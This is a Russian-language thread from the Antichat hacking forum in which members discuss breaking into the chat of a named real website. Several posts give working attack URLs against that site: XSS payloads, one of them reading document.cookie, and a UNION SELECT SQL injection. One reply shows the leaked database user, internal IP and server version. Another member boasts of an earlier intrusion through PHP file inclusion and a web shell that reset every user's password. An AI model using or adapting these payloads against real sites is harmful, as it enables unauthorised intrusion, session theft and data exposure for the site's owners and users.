ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

...
  #11  
Старый 21.10.2006, 05:17
Аватар для corsp_puttrider
corsp_puttrider
Новичок
Регистрация: 16.10.2006
Сообщений: 18
Провел на форуме:
48695

Репутация: 17
По умолчанию ...

Цитата:
Сообщение от vnuki  
to kaban ты дал мне эту ссылкук http://www.telecom7.ru/Chat/board.php?ss="><script>alert(/XSS/)</script>
я её вставил и ты дал ещё одну ссылку чтоб почитать но я так толкьом не понял к чему она.если тебе не трудно то обьясни...пожалуста.
Это значит что первый SQL запрос выдал ошибку => тебе надо присоединить еще один SQL запрос UNION SELECT 1,2,3/* вот тогда первый выдает ошибку выполняется второй, по-моему на этом сайте во второй колонке передается индентификатор рмсунка => можно попытаться исполнить произволбный php код ))
 
Ответить с цитированием

  #12  
Старый 21.10.2006, 16:20
Аватар для vnuki
vnuki
Новичок
Регистрация: 20.10.2006
Сообщений: 25
Провел на форуме:
601498

Репутация: 16
Exclamation

Цитата:
Сообщение от corsp_puttrider  
Это значит что первый SQL запрос выдал ошибку => тебе надо присоединить еще один SQL запрос UNION SELECT 1,2,3/* вот тогда первый выдает ошибку выполняется второй, по-моему на этом сайте во второй колонке передается индентификатор рмсунка => можно попытаться исполнить произволбный php код ))
у тебя есть icq ? дай пожалуста я тебе стукну.и ты мне если не трудно обьясни по понятнее.
 
Ответить с цитированием

  #13  
Старый 21.10.2006, 16:28
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Вариант со сукулью не пройдёт не отобразит из за ошибки
http://www.telecom7.ru/Chat/Img.php?id=-211578+union+select+null,user(),null/*
 
Ответить с цитированием

  #14  
Старый 21.10.2006, 19:53
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

2 Nova
а если просмотреть исходный код изображения то получем
USER() telecom7@192.168.212.116
VERSION() 4.0.15a
DATABASE() telecom7
__________________
 
Ответить с цитированием

  #15  
Старый 21.10.2006, 21:31
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Цитата:
Сообщение от +toxa+  
2 Nova
а если просмотреть исходный код изображения то получем
USER() telecom7@192.168.212.116
VERSION() 4.0.15a
DATABASE() telecom7
Мдя а я незаметил =)
 
Ответить с цитированием

  #16  
Старый 18.05.2007, 01:37
Аватар для JOKER_KILL
JOKER_KILL
Новичок
Регистрация: 19.04.2005
Сообщений: 15
Провел на форуме:
8294

Репутация: 1
Отправить сообщение для JOKER_KILL с помощью ICQ
По умолчанию

Ну так что, его возможно взломать или нет? Что то так никто и не даёт точного ответа! Я слышал что его можно ломануть через сниффер но у меня что то не получилось! Чат его не принимает!
 
Ответить с цитированием

  #17  
Старый 19.05.2007, 23:49
Аватар для Зубчег
Зубчег
Познающий
Регистрация: 10.12.2006
Сообщений: 41
Провел на форуме:
202200

Репутация: 26
По умолчанию

Joker_kill

Что за бред ты несеш? Прочитай посты, а мы о чём говорим?

И с чего ты сделал вывод, что тут хакеров нету? Если ты слепой это твои проблемы...


Цитата:
Ну так что, его возможно взломать или нет?
ЗАПОМНИ

Всё что создано человеком, можно сломать.
 
Ответить с цитированием

  #18  
Старый 20.05.2007, 13:19
Аватар для [GeW]
[GeW]
Новичок
Регистрация: 18.04.2007
Сообщений: 22
Провел на форуме:
609007

Репутация: 27
Отправить сообщение для [GeW] с помощью ICQ
По умолчанию

Помнится в конце прошлого лета, я его поломал при помощи php-инклудинга. Затем через веб-шелл в eval() накатал скрипт, для смены пароля для определённого пользователя, но из-за ошибки в этом скрипте у всех пользователей пароль сменился на "p4ssw0rd". Админ 3 дня откат БД делал, а вину всю на своего прова свалил). Потом вроде эту багу прикрыли...
 
Ответить с цитированием

  #19  
Старый 20.05.2007, 13:40
Аватар для Neorin
Neorin
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме:
287714

Репутация: 40
По умолчанию

http://www.telecom7.ru/Chat/board.php?ss="><script>alert(document.cookie)</script>
покруи вызови вторую ошибку и всё будет круть))))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!! farik.aka E-Mail 1 17.09.2006 13:00
чАТ ДЛЯ ПОРТАЛА LavInaL Чаты 19 08.06.2006 19:03
чат на telecom7.ru Чаты 1 11.08.2002 16:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ